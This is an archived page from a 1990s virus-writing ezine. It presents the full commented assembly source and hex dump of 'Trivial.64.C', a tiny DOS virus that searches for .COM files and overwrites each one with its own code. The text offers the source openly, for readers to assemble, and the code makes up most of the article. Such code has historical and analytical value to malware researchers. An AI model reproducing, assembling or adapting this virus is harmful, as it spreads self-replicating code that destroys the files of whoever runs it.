Copy Link
Add to Bookmark
Report

SLAM2.020: Trivial.64.C Disassembly by Gothmog/[DHA]

eZine's profile picture
Published in 
Slam
 · 2 years ago

[Trivial.64.C] (c) 1995 Wraith/DHA
Disassembled by Gothmog/[DHA]

Seems I had deleted the source code for this virus, thinking nothing of it, until I noticed that F-Protect v2.26 and Dr. Solomon's FindVirus v7.69 have started detecting it as a unique virus. Well, friend Wraith, seems you have your fifteen minutes (seconds, probably, with this virus) of fame...

In any case, I hauled out Sourcer, disassembled the .com file, and threw in a few comments, for posterity's sake. Even the lamest of the lame should be able to understand this code, if not, shoot yourself. For those of you that are without a `working' assembler (Borland's Turbo Assembler v4.00 or v5.00 should work fine), a hex dump follows at the conclusion of the source.

.model tiny 
.code
org 100h

virus_start:
mov ah, 4Eh ; ah = 4Eh, find first file
mov dx, offset file_mask ; points to *.com
int 21h ; do it!

find_file:
jc exit_virus ; exit if no files found

mov ax, 3D01h ; open file for writing
mov dx, 09Eh ; location of filename in psp
int 21h ; do it!

xchg bx, ax ; put filehandle in bx

mov ah, 40h ; write file from handle bx
; number of bytes to write

mov cx, virus_end - virus_start

mov dx, offset virus_start ; start writing from cs:100h
int 21h ; write the bitch!

mov ah, 3Eh ; ah = 3Eh, close file
int 21h ; do it!

mov ah, 4Fh ; ah = 4Fh, find next file
int 21h ; do it!

jmp find_file

exit_virus:
int 20h ; we're outta here...

virus_name db '[TRiV]', 00h
virus_author db 'Wraith/DHA', 00h

file_mask db '*.com', 00h

virus_end equ $

end virus_start

; And finally, the hex dump:
;
; 0100 B4 4E BA 3A 01 CD 21 72 1D B8 01 3D BA 9E 00 CD .N.:..!r...=....
; 0110 21 93 B4 40 B9 40 00 BA 00 01 CD 21 B4 3E CD 21 !..@.@.....!.>.!
; 0120 B4 4F CD 21 EB E1 CD 20 5B 54 52 69 56 5D 00 57 .O.!... [TRiV].W
; 0130 72 61 69 74 68 2F 44 48 41 00 2A 2E 63 6F 6D 00 raith/DHA.*.com.
;
; ============================================================[ code ends ]==

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT